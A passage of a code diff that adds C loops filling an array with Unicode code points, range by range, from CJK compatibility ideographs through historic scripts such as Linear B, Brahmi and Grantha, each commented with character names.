+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+// 10000..1007F; Linear B Syllabary
+	c = 0x10000;		// from LINEAR B SYLLABLE B008 A
+	while (c <= 0x1000b)	// ..to LINEAR B SYLLABLE B046 JE
+		charset[i++] = c++;
+	c = 0x1000d;		// from LINEAR B SYLLABLE B036 JO
+	while (c <= 0x10026)	// ..to LINEAR B SYLLABLE B032 QO
+		charset[i++] = c++;
+	c = 0x10028;		// from LINEAR B SYLLABLE B060 RA
+	while (c <= 0x1003a)	// ..to LINEAR B SYLLABLE B042 WO
+		charset[i++] = c++;
+	charset[i++] = 0x1003c;	// LINEAR B SYLLABLE B017 ZA
+	charset[i++] = 0x1003d;	// LINEAR B SYLLABLE B074 ZE
+	c = 0x1003f;		// from LINEAR B SYLLABLE B020 ZO
+	while (c <= 0x1004d)	// ..to LINEAR B SYLLABLE B091 TWO
+		charset[i++] = c++;
+	c = 0x10050;		// from LINEAR B SYMBOL B018
+	while (c <= 0x1005d)	// ..to LINEAR B SYMBOL B089
+		charset[i++] = c++;
+// 10080..100FF; Linear B Ideograms
+	c = 0x10080;		// from LINEAR B IDEOGRAM B100 MAN
+	while (c <= 0x100fa)	// ..to LINEAR B IDEOGRAM VESSEL B305
+		charset[i++] = c++;
+// 10100..1013F; Aegean Numbers
+	charset[i++] = 0x10100;	// AEGEAN WORD SEPARATOR LINE
+	charset[i++] = 0x10102;	// AEGEAN CHECK MARK
+	c = 0x10107;		// from AEGEAN NUMBER ONE
+	while (c <= 0x10133)	// ..to AEGEAN NUMBER NINETY THOUSAND
+		charset[i++] = c++;
+	c = 0x10137;		// from AEGEAN WEIGHT BASE UNIT
+	while (c <= 0x1013f)	// ..to AEGEAN MEASURE THIRD SUBUNIT
+		charset[i++] = c++;
+// 10140..1018F; Ancient Greek Numbers
+	c = 0x10140;		// from GREEK ACROPHONIC ATTIC ONE QUARTER
+	while (c <= 0x1018e)	// ..to NOMISMA SIGN
+		charset[i++] = c++;
+// 10190..101CF; Ancient Symbols
+	c = 0x10190;		// from ROMAN SEXTANS SIGN
+	while (c <= 0x1019b)	// ..to ROMAN CENTURIAL SIGN
+		charset[i++] = c++;
+	charset[i++] = 0x101a0;	// GREEK SYMBOL TAU RHO
+// 101D0..101FF; Phaistos Disc
+	c = 0x101d0;		// from PHAISTOS DISC SIGN PEDESTRIAN
+	while (c <= 0x101fd)	// ..to PHAISTOS DISC SIGN COMBINING OBLIQUE STROKE
+		charset[i++] = c++;
+// 10280..1029F; Lycian
+	c = 0x10280;		// from LYCIAN LETTER A
+	while (c <= 0x1029c)	// ..to LYCIAN LETTER X
+		charset[i++] = c++;
+// 102A0..102DF; Carian
+	c = 0x102a0;		// from CARIAN LETTER A
+	while (c <= 0x102d0)	// ..to CARIAN LETTER UUU3
+		charset[i++] = c++;
+// 102E0..102FF; Coptic Epact Numbers
+	c = 0x102e0;		// from COPTIC EPACT THOUSANDS MARK
+	while (c <= 0x102fb)	// ..to COPTIC EPACT NUMBER NINE HUNDRED
+		charset[i++] = c++;
+// 10300..1032F; Old Italic
+	c = 0x10300;		// from OLD ITALIC LETTER A
+	while (c <= 0x10323)	// ..to OLD ITALIC NUMERAL FIFTY
+		charset[i++] = c++;
+	charset[i++] = 0x1032d;	// OLD ITALIC LETTER YE
+	charset[i++] = 0x1032f;	// OLD ITALIC LETTER SOUTHERN TSE
+// 10330..1034F; Gothic
+	c = 0x10330;		// from GOTHIC LETTER AHSA
+	while (c <= 0x1034a)	// ..to GOTHIC LETTER NINE HUNDRED
+		charset[i++] = c++;
+// 10350..1037F; Old Permic
+	c = 0x10350;		// from OLD PERMIC LETTER AN
+	while (c <= 0x1037a)	// ..to COMBINING OLD PERMIC LETTER SII
+		charset[i++] = c++;
+// 10380..1039F; Ugaritic
+	c = 0x10380;		// from UGARITIC LETTER ALPA
+	while (c <= 0x1039d)	// ..to UGARITIC LETTER SSU
+		charset[i++] = c++;
+	charset[i++] = 0x1039f;	// UGARITIC WORD DIVIDER
+// 103A0..103DF; Old Persian
+	c = 0x103a0;		// from OLD PERSIAN SIGN A
+	while (c <= 0x103c3)	// ..to OLD PERSIAN SIGN HA
+		charset[i++] = c++;
+	c = 0x103c8;		// from OLD PERSIAN SIGN AURAMAZDAA
+	while (c <= 0x103d5)	// ..to OLD PERSIAN NUMBER HUNDRED
+		charset[i++] = c++;
+// 10400..1044F; Deseret
+	c = 0x10400;		// from DESERET CAPITAL LETTER LONG I
+	while (c <= 0x1044f)	// ..to DESERET SMALL LETTER EW
+		charset[i++] = c++;
+// 10450..1047F; Shavian
+	c = 0x10450;		// from SHAVIAN LETTER PEEP
+	while (c <= 0x1047f)	// ..to SHAVIAN LETTER YEW
+		charset[i++] = c++;
+// 10480..104AF; Osmanya
+	c = 0x10480;		// from OSMANYA LETTER ALEF
+	while (c <= 0x1049d)	// ..to OSMANYA LETTER OO
+		charset[i++] = c++;
+	c = 0x104a0;		// from OSMANYA DIGIT ZERO
+	while (c <= 0x104a9)	// ..to OSMANYA DIGIT NINE
+		charset[i++] = c++;
+// 104B0..104FF; Osage
+	c = 0x104b0;		// from OSAGE CAPITAL LETTER A
+	while (c <= 0x104d3)	// ..to OSAGE CAPITAL LETTER ZHA
+		charset[i++] = c++;
+	c = 0x104d8;		// from OSAGE SMALL LETTER A
+	while (c <= 0x104fb)	// ..to OSAGE SMALL LETTER ZHA
+		charset[i++] = c++;
+// 10500..1052F; Elbasan
+	c = 0x10500;		// from ELBASAN LETTER A
+	while (c <= 0x10527)	// ..to ELBASAN LETTER KHE
+		charset[i++] = c++;
+// 10530..1056F; Caucasian Albanian
+	c = 0x10530;		// from CAUCASIAN ALBANIAN LETTER ALT
+	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
+		charset[i++] = c++;
+	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10600..1077F; Linear A
+	c = 0x10600;		// from LINEAR A SIGN AB001
+	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
+		charset[i++] = c++;
+	c = 0x10740;		// from LINEAR A SIGN A701 A
+	while (c <= 0x10755)	// ..to LINEAR A SIGN A732 JE
+		charset[i++] = c++;
+	c = 0x10760;		// from LINEAR A SIGN A800
+	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
+		charset[i++] = c++;
+// 10800..1083F; Cypriot Syllabary
+	c = 0x10800;		// from CYPRIOT SYLLABLE A
+	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
+		charset[i++] = c++;
+	c = 0x1080a;		// from CYPRIOT SYLLABLE KA
+	while (c <= 0x10835)	// ..to CYPRIOT SYLLABLE WO
+		charset[i++] = c++;
+	charset[i++] = 0x10837;	// CYPRIOT SYLLABLE XA
+	charset[i++] = 0x10838;	// CYPRIOT SYLLABLE XE
+	c = 0x1083c;		// from CYPRIOT SYLLABLE ZA
+	while (c <= 0x1083f)	// ..to CYPRIOT SYLLABLE ZO
+		charset[i++] = c++;
+// 10840..1085F; Imperial Aramaic
+	c = 0x10840;		// from IMPERIAL ARAMAIC LETTER ALEPH
+	while (c <= 0x10855)	// ..to IMPERIAL ARAMAIC LETTER TAW
+		charset[i++] = c++;
+	c = 0x10857;		// from IMPERIAL ARAMAIC SECTION SIGN
+	while (c <= 0x1085f)	// ..to IMPERIAL ARAMAIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 10860..1087F; Palmyrene
+	c = 0x10860;		// from PALMYRENE LETTER ALEPH
+	while (c <= 0x1087f)	// ..to PALMYRENE NUMBER TWENTY
+		charset[i++] = c++;
+// 10880..108AF; Nabataean
+	c = 0x10880;		// from NABATAEAN LETTER FINAL ALEPH
+	while (c <= 0x1089e)	// ..to NABATAEAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x108a7;		// from NABATAEAN NUMBER ONE
+	while (c <= 0x108af)	// ..to NABATAEAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 108E0..108FF; Hatran
+	c = 0x108e0;		// from HATRAN LETTER ALEPH
+	while (c <= 0x108f2)	// ..to HATRAN LETTER QOPH
+		charset[i++] = c++;
+	charset[i++] = 0x108f4;	// HATRAN LETTER SHIN
+	charset[i++] = 0x108f5;	// HATRAN LETTER TAW
+	c = 0x108fb;		// from HATRAN NUMBER ONE
+	while (c <= 0x108ff)	// ..to HATRAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10900..1091F; Phoenician
+	c = 0x10900;		// from PHOENICIAN LETTER ALF
+	while (c <= 0x1091b)	// ..to PHOENICIAN NUMBER THREE
+		charset[i++] = c++;
+	charset[i++] = 0x1091f;	// PHOENICIAN WORD SEPARATOR
+// 10920..1093F; Lydian
+	c = 0x10920;		// from LYDIAN LETTER A
+	while (c <= 0x10939)	// ..to LYDIAN LETTER C
+		charset[i++] = c++;
+	charset[i++] = 0x1093f;	// LYDIAN TRIANGULAR MARK
+// 10980..1099F; Meroitic Hieroglyphs
+	c = 0x10980;		// from MEROITIC HIEROGLYPHIC LETTER A
+	while (c <= 0x1099f)	// ..to MEROITIC HIEROGLYPHIC SYMBOL VIDJ-2
+		charset[i++] = c++;
+// 109A0..109FF; Meroitic Cursive
+	c = 0x109a0;		// from MEROITIC CURSIVE LETTER A
+	while (c <= 0x109b7)	// ..to MEROITIC CURSIVE LETTER DA
+		charset[i++] = c++;
+	c = 0x109bc;		// from MEROITIC CURSIVE FRACTION ELEVEN TWELFTHS
+	while (c <= 0x109cf)	// ..to MEROITIC CURSIVE NUMBER SEVENTY
+		charset[i++] = c++;
+	c = 0x109d2;		// from MEROITIC CURSIVE NUMBER ONE HUNDRED
+	while (c <= 0x109ff)	// ..to MEROITIC CURSIVE FRACTION TEN TWELFTHS
+		charset[i++] = c++;
+// 10A00..10A5F; Kharoshthi
+	c = 0x10a00;		// from KHAROSHTHI LETTER A
+	while (c <= 0x10a03)	// ..to KHAROSHTHI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x10a05;	// KHAROSHTHI VOWEL SIGN E
+	charset[i++] = 0x10a06;	// KHAROSHTHI VOWEL SIGN O
+	c = 0x10a0c;		// from KHAROSHTHI VOWEL LENGTH MARK
+	while (c <= 0x10a13)	// ..to KHAROSHTHI LETTER GHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a15;	// KHAROSHTHI LETTER CA
+	charset[i++] = 0x10a17;	// KHAROSHTHI LETTER JA
+	c = 0x10a19;		// from KHAROSHTHI LETTER NYA
+	while (c <= 0x10a35)	// ..to KHAROSHTHI LETTER VHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a38;	// KHAROSHTHI SIGN BAR ABOVE
+	charset[i++] = 0x10a3a;	// KHAROSHTHI SIGN DOT BELOW
+	c = 0x10a3f;		// from KHAROSHTHI VIRAMA
+	while (c <= 0x10a48)	// ..to KHAROSHTHI FRACTION ONE HALF
+		charset[i++] = c++;
+	c = 0x10a50;		// from KHAROSHTHI PUNCTUATION DOT
+	while (c <= 0x10a58)	// ..to KHAROSHTHI PUNCTUATION LINES
+		charset[i++] = c++;
+// 10A60..10A7F; Old South Arabian
+	c = 0x10a60;		// from OLD SOUTH ARABIAN LETTER HE
+	while (c <= 0x10a7f)	// ..to OLD SOUTH ARABIAN NUMERIC INDICATOR
+		charset[i++] = c++;
+// 10A80..10A9F; Old North Arabian
+	c = 0x10a80;		// from OLD NORTH ARABIAN LETTER HEH
+	while (c <= 0x10a9f)	// ..to OLD NORTH ARABIAN NUMBER TWENTY
+		charset[i++] = c++;
+// 10AC0..10AFF; Manichaean
+	c = 0x10ac0;		// from MANICHAEAN LETTER ALEPH
+	while (c <= 0x10ae6)	// ..to MANICHAEAN ABBREVIATION MARK BELOW
+		charset[i++] = c++;
+	c = 0x10aeb;		// from MANICHAEAN NUMBER ONE
+	while (c <= 0x10af6)	// ..to MANICHAEAN PUNCTUATION LINE FILLER
+		charset[i++] = c++;
+// 10B00..10B3F; Avestan
+	c = 0x10b00;		// from AVESTAN LETTER A
+	while (c <= 0x10b35)	// ..to AVESTAN LETTER HE
+		charset[i++] = c++;
+	c = 0x10b39;		// from AVESTAN ABBREVIATION MARK
+	while (c <= 0x10b3f)	// ..to LARGE ONE RING OVER TWO RINGS PUNCTUATION
+		charset[i++] = c++;
+// 10B40..10B5F; Inscriptional Parthian
+	c = 0x10b40;		// from INSCRIPTIONAL PARTHIAN LETTER ALEPH
+	while (c <= 0x10b55)	// ..to INSCRIPTIONAL PARTHIAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b58;		// from INSCRIPTIONAL PARTHIAN NUMBER ONE
+	while (c <= 0x10b5f)	// ..to INSCRIPTIONAL PARTHIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B60..10B7F; Inscriptional Pahlavi
+	c = 0x10b60;		// from INSCRIPTIONAL PAHLAVI LETTER ALEPH
+	while (c <= 0x10b72)	// ..to INSCRIPTIONAL PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b78;		// from INSCRIPTIONAL PAHLAVI NUMBER ONE
+	while (c <= 0x10b7f)	// ..to INSCRIPTIONAL PAHLAVI NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B80..10BAF; Psalter Pahlavi
+	c = 0x10b80;		// from PSALTER PAHLAVI LETTER ALEPH
+	while (c <= 0x10b91)	// ..to PSALTER PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b99;		// from PSALTER PAHLAVI SECTION MARK
+	while (c <= 0x10b9c)	// ..to PSALTER PAHLAVI FOUR DOTS WITH DOT
+		charset[i++] = c++;
+	c = 0x10ba9;		// from PSALTER PAHLAVI NUMBER ONE
+	while (c <= 0x10baf)	// ..to PSALTER PAHLAVI NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10C00..10C4F; Old Turkic
+	c = 0x10c00;		// from OLD TURKIC LETTER ORKHON A
+	while (c <= 0x10c48)	// ..to OLD TURKIC LETTER ORKHON BASH
+		charset[i++] = c++;
+// 10C80..10CFF; Old Hungarian
+	c = 0x10c80;		// from OLD HUNGARIAN CAPITAL LETTER A
+	while (c <= 0x10cb2)	// ..to OLD HUNGARIAN CAPITAL LETTER US
+		charset[i++] = c++;
+	c = 0x10cc0;		// from OLD HUNGARIAN SMALL LETTER A
+	while (c <= 0x10cf2)	// ..to OLD HUNGARIAN SMALL LETTER US
+		charset[i++] = c++;
+	c = 0x10cfa;		// from OLD HUNGARIAN NUMBER ONE
+	while (c <= 0x10cff)	// ..to OLD HUNGARIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10D00..10D3F; Hanifi Rohingya
+	c = 0x10d00;		// from HANIFI ROHINGYA LETTER A
+	while (c <= 0x10d27)	// ..to HANIFI ROHINGYA SIGN TASSI
+		charset[i++] = c++;
+	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
+	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
+		charset[i++] = c++;
+// 10E60..10E7F; Rumi Numeral Symbols
+	c = 0x10e60;		// from RUMI DIGIT ONE
+	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
+		charset[i++] = c++;
+// 10F00..10F2F; Old Sogdian
+	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
+	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
+		charset[i++] = c++;
+// 10F30..10F6F; Sogdian
+	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
+	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
+		charset[i++] = c++;
+// 11000..1107F; Brahmi
+	c = 0x11000;		// from BRAHMI SIGN CANDRABINDU
+	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
+		charset[i++] = c++;
+	c = 0x11052;		// from BRAHMI NUMBER ONE
+	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
+// 11080..110CF; Kaithi
+	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
+	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
+// 110D0..110FF; Sora Sompeng
+	c = 0x110d0;		// from SORA SOMPENG LETTER SAH
+	while (c <= 0x110e8)	// ..to SORA SOMPENG LETTER MAE
+		charset[i++] = c++;
+	c = 0x110f0;		// from SORA SOMPENG DIGIT ZERO
+	while (c <= 0x110f9)	// ..to SORA SOMPENG DIGIT NINE
+		charset[i++] = c++;
+// 11100..1114F; Chakma
+	c = 0x11100;		// from CHAKMA SIGN CANDRABINDU
+	while (c <= 0x11134)	// ..to CHAKMA MAAYYAA
+		charset[i++] = c++;
+	c = 0x11136;		// from CHAKMA DIGIT ZERO
+	while (c <= 0x11146)	// ..to CHAKMA VOWEL SIGN EI
+		charset[i++] = c++;
+// 11150..1117F; Mahajani
+	c = 0x11150;		// from MAHAJANI LETTER A
+	while (c <= 0x11176)	// ..to MAHAJANI LIGATURE SHRI
+		charset[i++] = c++;
+// 11180..111DF; Sharada
+	c = 0x11180;		// from SHARADA SIGN CANDRABINDU
+	while (c <= 0x111cd)	// ..to SHARADA SUTRA MARK
+		charset[i++] = c++;
+	c = 0x111d0;		// from SHARADA DIGIT ZERO
+	while (c <= 0x111df)	// ..to SHARADA SECTION MARK-2
+		charset[i++] = c++;
+// 111E0..111FF; Sinhala Archaic Numbers
+	c = 0x111e1;		// from SINHALA ARCHAIC DIGIT ONE
+	while (c <= 0x111f4)	// ..to SINHALA ARCHAIC NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 11200..1124F; Khojki
+	c = 0x11200;		// from KHOJKI LETTER A
+	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
+		charset[i++] = c++;
+	c = 0x11213;		// from KHOJKI LETTER NYA
+	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+		charset[i++] = c++;
+// 11280..112AF; Multani
+	c = 0x11280;		// from MULTANI LETTER A
+	while (c <= 0x11286)	// ..to MULTANI LETTER GA
+		charset[i++] = c++;
+	c = 0x1128a;		// from MULTANI LETTER CA
+	while (c <= 0x1128d)	// ..to MULTANI LETTER JJA
+		charset[i++] = c++;
+	c = 0x1128f;		// from MULTANI LETTER NYA
+	while (c <= 0x1129d)	// ..to MULTANI LETTER BA
+		charset[i++] = c++;
+	c = 0x1129f;		// from MULTANI LETTER BHA
+	while (c <= 0x112a9)	// ..to MULTANI SECTION MARK
+		charset[i++] = c++;
+// 112B0..112FF; Khudawadi
+	c = 0x112b0;		// from KHUDAWADI LETTER A
+	while (c <= 0x112ea)	// ..to KHUDAWADI SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0x112f0;		// from KHUDAWADI DIGIT ZERO
+	while (c <= 0x112f9)	// ..to KHUDAWADI DIGIT NINE
+		charset[i++] = c++;
+// 11300..1137F; Grantha
+	c = 0x11300;		// from GRANTHA SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0x11303)	// ..to GRANTHA SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x11305;		// from GRANTHA LETTER A
+	while (c <= 0x1130c)	// ..to GRANTHA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x1130f;	// GRANTHA LETTER EE
+	charset[i++] = 0x11310;	// GRANTHA LETTER AI
+	c = 0x11313;		// from GRANTHA LETTER OO
+	while (c <= 0x11328)	// ..to GRANTHA LETTER NA
+		charset[i++] = c++;
+	c = 0x1132a;		// from GRANTHA LETTER PA
+	while (c <= 0x11330)	// ..to GRANTHA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0x11332;	// GRANTHA LETTER LA
+	charset[i++] = 0x11333;	// GRANTHA LETTER LLA
+	c = 0x11335;		// from GRANTHA LETTER VA
+	while (c <= 0x11339)	// ..to GRANTHA LETTER HA
+		charset[i++] = c++;
+	c = 0x1133b;		// from COMBINING BINDU BELOW
+	while (c <= 0x11344)	// ..to GRANTHA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x11347;	// GRANTHA VOWEL SIGN EE
+	charset[i++] = 0x11348;	// GRANTHA VOWEL SIGN AI
+	charset[i++] = 0x1134b;	// GRANTHA VOWEL SIGN OO
+	charset[i++] = 0x1134d;	// GRANTHA SIGN VIRAMA
+	c = 0x1135d;		// from GRANTHA SIGN PLUTA
+	while (c <= 0x11363)	// ..to GRANTHA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11366;		// from COMBINING GRANTHA DIGIT ZERO
+	while (c <= 0x1136c)	// ..to COMBINING GRANTHA DIGIT SIX
+		charset[i++] = c++;
+	c = 0x11370;		// from COMBINING GRANTHA LETTER A
+	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
+		charset[i++] = c++;
+// 11400..1147F; Newa
+	c = 0x11400;		// from NEWA LETTER A
+	while (c <= 0x11459)	// ..to NEWA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1145d;	// NEWA INSERTION SIGN
+	charset[i++] = 0x1145e;	// NEWA SANDHI MARK
+// 11480..114DF; Tirhuta
+	c = 0x11480;		// from TIRHUTA ANJI
+	while (c <= 0x114c7)	// ..to TIRHUTA OM
+		charset[i++] = c++;
+	c = 0x114d0;		// from TIRHUTA DIGIT ZERO
+	while (c <= 0x114d9)	// ..to TIRHUTA DIGIT NINE
+		charset[i++] = c++;
+// 11580..115FF; Siddham
+	c = 0x11580;		// from SIDDHAM LETTER A
+	while (c <= 0x115b5)	// ..to SIDDHAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	c = 0x115b8;		// from SIDDHAM VOWEL SIGN E
+	while (c <= 0x115dd)	// ..to SIDDHAM VOWEL SIGN ALTERNATE UU
+		charset[i++] = c++;
+// 11600..1165F; Modi
+	c = 0x11600;		// from MODI LETTER A
+	while (c <= 0x11644)	// ..to MODI SIGN HUVA
+		charset[i++] = c++;
+	c = 0x11650;		// from MODI DIGIT ZERO
+	while (c <= 0x11659)	// ..to MODI DIGIT NINE
+		charset[i++] = c++;
+// 11660..1167F; Mongolian Supplement
+	c = 0x11660;		// from MONGOLIAN BIRGA WITH ORNAMENT
+	while (c <= 0x1166c)	// ..to MONGOLIAN TURNED SWIRL BIRGA WITH DOUBLE ORNAMENT
+		charset[i++] = c++;
+// 11680..116CF; Takri
+	c = 0x11680;		// from TAKRI LETTER A
+	while (c <= 0x116b7)	// ..to TAKRI SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x116c0;		// from TAKRI DIGIT ZERO
+	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
+		charset[i++] = c++;
+// 11700..1173F; Ahom
+	c = 0x11700;		// from AHOM LETTER KA
+	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
+		charset[i++] = c++;
+	c = 0x1171d;		// from AHOM CONSONANT SIGN MEDIAL LA
+	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
+		charset[i++] = c++;
+	c = 0x11730;		// from AHOM DIGIT ZERO
+	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+		charset[i++] = c++;
+// 11800..1184F; Dogra
+	c = 0x11800;		// from DOGRA LETTER A
+	while (c <= 0x1183b)	// ..to DOGRA ABBREVIATION SIGN
+		charset[i++] = c++;
+// 118A0..118FF; Warang Citi
+	c = 0x118a0;		// from WARANG CITI CAPITAL LETTER NGAA
